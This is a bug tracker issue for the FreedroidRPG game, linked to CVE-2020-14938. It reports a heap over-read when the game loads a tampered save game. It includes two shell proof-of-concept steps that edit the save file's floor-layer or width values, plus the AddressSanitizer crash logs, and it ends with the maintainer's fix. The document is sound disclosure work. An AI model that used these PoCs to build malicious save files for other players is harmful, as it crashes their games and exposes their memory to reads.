Issue952

Issues
Show Not Resolved
Show All
Search

Login




Register
Lost your login?

Help
Roundup docs

Title Heap over-read in loading untrusted save game
Priority release-blocker Status resolved
Assigned To fluzz Keywords
Linked issues CVE-2020-14938: An issue was discovered in map.c
View: 968 		Watchers fluzz

Submitted on 2019-07-25 14h00 by mmmds, last changed by fluzz.

Messages
Author: mmmds Date: 2019-07-25   14h00 
This issue assumes that users may load malicious save games, for example downloaded or 
received from other users.

Reading outside "this_line" buffer is possible by manipulating loadlevel->floor_layers 
( >= 48 ) or floor_layers->xlen ( >= 2048 ) values in save game file.

map.c
static char *decode_map(level *loadlevel, char *data)
836  		memset(this_line, 0, 4096);

845  		for (col = 0; col < loadlevel->xlen; col++) {

850  				tmp = strtol(this_line + 4 * (loadlevel->floor_layers * 
col + layer), NULL, 10);


PoC 1:
CH="mmm"
cd ~/.freedroid_rpg
mv $CH.shp $CH.gz
gunzip $CH.gz
sed -i -e "0,/floor layers: 2/s/floor layers: 2/floor layers: 48/" $CH
gzip $CH
mv $CH.gz $CH.shp

PoC 2:
CH="mmm"
cd ~/.freedroid_rpg
mv $CH.shp $CH.gz
gunzip $CH.gz
sed -i -e "0,/xlen of this level: 90/s/xlen of this level: 90/xlen of this level: 
2048/" $CH
gzip $CH
mv $CH.gz $CH.shp


Crash for PoC 1:

=================================================================
==24662==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb27ed580 at pc 
0xb7aaefd8 bp 0xbfb2a1a8 sp 0xbfb29d7c
READ of size 1 at 0xb27ed580 thread T0
    #0 0xb7aaefd7 in strtol (/usr/lib/i386-linux-gnu/libasan.so.2+0x6efd7)
    #1 0x80fc8cc in decode_map /root/projects/freedroid-src/src/map.c:850
    #2 0x80fe326 in decode_level /root/projects/freedroid-src/src/map.c:1126
    #3 0x80ff639 in LoadShip /root/projects/freedroid-src/src/map.c:1303
    #4 0x8127b85 in load_saved_game /root/projects/freedroid-src/src/saveloadgame.c:366
    #5 0x8128240 in load_game /root/projects/freedroid-src/src/saveloadgame.c:478
    #6 0x810dbfd in load_named_game /root/projects/freedroid-src/src/menu.c:1680
    #7 0x810e57a in do_savegame_selection_and_act /root/projects/freedroid-
src/src/menu.c:1796
    #8 0x810e75c in Load_Existing_Hero_Menu /root/projects/freedroid-
src/src/menu.c:1827
    #9 0x810ecaf in Single_Player_Menu /root/projects/freedroid-src/src/menu.c:1895
    #10 0x8108ecd in Startup_handle /root/projects/freedroid-src/src/menu.c:930
    #11 0x8108b6a in RunSubMenu /root/projects/freedroid-src/src/menu.c:872
    #12 0x8108e2f in RunMenu /root/projects/freedroid-src/src/menu.c:901
    #13 0x8108e4c in StartupMenu /root/projects/freedroid-src/src/menu.c:907
    #14 0x80f6e70 in main /root/projects/freedroid-src/src/main.c:179
    #15 0xb75f7636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
    #16 0x805c3ee  (/root/projects/freedroid-src/bin/bin/freedroidRPG+0x805c3ee)

0xb27ed580 is located 128 bytes to the right of 4096-byte region 
[0xb27ec500,0xb27ed500)
allocated by thread T0 here:
    #0 0xb7ad6f8e in calloc (/usr/lib/i386-linux-gnu/libasan.so.2+0x96f8e)
    #1 0x814a4fd in MyMalloc /root/projects/freedroid-src/src/text_public.c:68
    #2 0x80fc709 in decode_map /root/projects/freedroid-src/src/map.c:825
    #3 0x80fe326 in decode_level /root/projects/freedroid-src/src/map.c:1126
    #4 0x80ff639 in LoadShip /root/projects/freedroid-src/src/map.c:1303
    #5 0x8127b85 in load_saved_game /root/projects/freedroid-src/src/saveloadgame.c:366
    #6 0x8128240 in load_game /root/projects/freedroid-src/src/saveloadgame.c:478
    #7 0x810dbfd in load_named_game /root/projects/freedroid-src/src/menu.c:1680
    #8 0x810e57a in do_savegame_selection_and_act /root/projects/freedroid-
src/src/menu.c:1796
    #9 0x810e75c in Load_Existing_Hero_Menu /root/projects/freedroid-
src/src/menu.c:1827
    #10 0x810ecaf in Single_Player_Menu /root/projects/freedroid-src/src/menu.c:1895
    #11 0x8108ecd in Startup_handle /root/projects/freedroid-src/src/menu.c:930
    #12 0x8108b6a in RunSubMenu /root/projects/freedroid-src/src/menu.c:872
    #13 0x8108e2f in RunMenu /root/projects/freedroid-src/src/menu.c:901
    #14 0x8108e4c in StartupMenu /root/projects/freedroid-src/src/menu.c:907
    #15 0x80f6e70 in main /root/projects/freedroid-src/src/main.c:179
    #16 0xb75f7636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)

SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 strtol
Shadow bytes around the buggy address:
  0x364fda60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x364fda70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x364fda80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x364fda90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x364fdaa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x364fdab0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x364fdac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x364fdad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x364fdae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x364fdaf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x364fdb00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
==24662==ABORTING  



Crash for PoC 2:

=================================================================
==24677==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb27ee900 at pc 
0xb7acbfd8 bp 0xbf9a1d58 sp 0xbf9a192c
READ of size 1 at 0xb27ee900 thread T0
    #0 0xb7acbfd7 in strtol (/usr/lib/i386-linux-gnu/libasan.so.2+0x6efd7)
    #1 0x80fc8cc in decode_map /root/projects/freedroid-src/src/map.c:850
    #2 0x80fe326 in decode_level /root/projects/freedroid-src/src/map.c:1126
    #3 0x80ff639 in LoadShip /root/projects/freedroid-src/src/map.c:1303
    #4 0x8127b85 in load_saved_game /root/projects/freedroid-src/src/saveloadgame.c:366
    #5 0x8128240 in load_game /root/projects/freedroid-src/src/saveloadgame.c:478
    #6 0x810dbfd in load_named_game /root/projects/freedroid-src/src/menu.c:1680
    #7 0x810e57a in do_savegame_selection_and_act /root/projects/freedroid-
src/src/menu.c:1796
    #8 0x810e75c in Load_Existing_Hero_Menu /root/projects/freedroid-
src/src/menu.c:1827
    #9 0x810ecaf in Single_Player_Menu /root/projects/freedroid-src/src/menu.c:1895
    #10 0x8108ecd in Startup_handle /root/projects/freedroid-src/src/menu.c:930
    #11 0x8108b6a in RunSubMenu /root/projects/freedroid-src/src/menu.c:872
    #12 0x8108e2f in RunMenu /root/projects/freedroid-src/src/menu.c:901
    #13 0x8108e4c in StartupMenu /root/projects/freedroid-src/src/menu.c:907
    #14 0x80f6e70 in main /root/projects/freedroid-src/src/main.c:179
    #15 0xb7614636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
    #16 0x805c3ee  (/root/projects/freedroid-src/bin/bin/freedroidRPG+0x805c3ee)

0xb27ee900 is located 0 bytes to the right of 4096-byte region [0xb27ed900,0xb27ee900)
allocated by thread T0 here:
    #0 0xb7af3f8e in calloc (/usr/lib/i386-linux-gnu/libasan.so.2+0x96f8e)
    #1 0x814a4fd in MyMalloc /root/projects/freedroid-src/src/text_public.c:68
    #2 0x80fc709 in decode_map /root/projects/freedroid-src/src/map.c:825
    #3 0x80fe326 in decode_level /root/projects/freedroid-src/src/map.c:1126
    #4 0x80ff639 in LoadShip /root/projects/freedroid-src/src/map.c:1303
    #5 0x8127b85 in load_saved_game /root/projects/freedroid-src/src/saveloadgame.c:366
    #6 0x8128240 in load_game /root/projects/freedroid-src/src/saveloadgame.c:478
    #7 0x810dbfd in load_named_game /root/projects/freedroid-src/src/menu.c:1680
    #8 0x810e57a in do_savegame_selection_and_act /root/projects/freedroid-
src/src/menu.c:1796
    #9 0x810e75c in Load_Existing_Hero_Menu /root/projects/freedroid-
src/src/menu.c:1827
    #10 0x810ecaf in Single_Player_Menu /root/projects/freedroid-src/src/menu.c:1895
    #11 0x8108ecd in Startup_handle /root/projects/freedroid-src/src/menu.c:930
    #12 0x8108b6a in RunSubMenu /root/projects/freedroid-src/src/menu.c:872
    #13 0x8108e2f in RunMenu /root/projects/freedroid-src/src/menu.c:901
    #14 0x8108e4c in StartupMenu /root/projects/freedroid-src/src/menu.c:907
    #15 0x80f6e70 in main /root/projects/freedroid-src/src/main.c:179
    #16 0xb7614636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)

SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 strtol
Shadow bytes around the buggy address:
  0x364fdcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x364fdce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x364fdcf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x364fdd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x364fdd10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x364fdd20:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x364fdd30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x364fdd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x364fdd50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x364fdd60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x364fdd70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
==24677==ABORTING
Author: fluzz Date: 2020-06-29   13h50 
see issue968
Author: fluzz Date: 2021-11-13   22h29 
Fixed by commit 17711a426
Author: fluzz Date: 2021-12-24   10h34 
Fixed in commit 17711a4268
History
Date User Action Args
2021-12-24 10:34:16fluzzsetmessages: + msg3722
2021-11-13 22:29:30fluzzsetstatus: open -> resolved
messages: + msg3719
2021-11-13 16:56:17fluzzlinkissue968 linked
2021-11-13 16:56:09fluzzsetlinked: + CVE-2020-14938: An issue was discovered in map.c
2021-11-05 10:52:18fluzzsetpriority: bug -> release-blocker
2020-06-29 13:50:13fluzzsetassignedto: fluzz
messages: + msg3693
nosy: + fluzz
2019-07-25 14:00:11mmmdscreate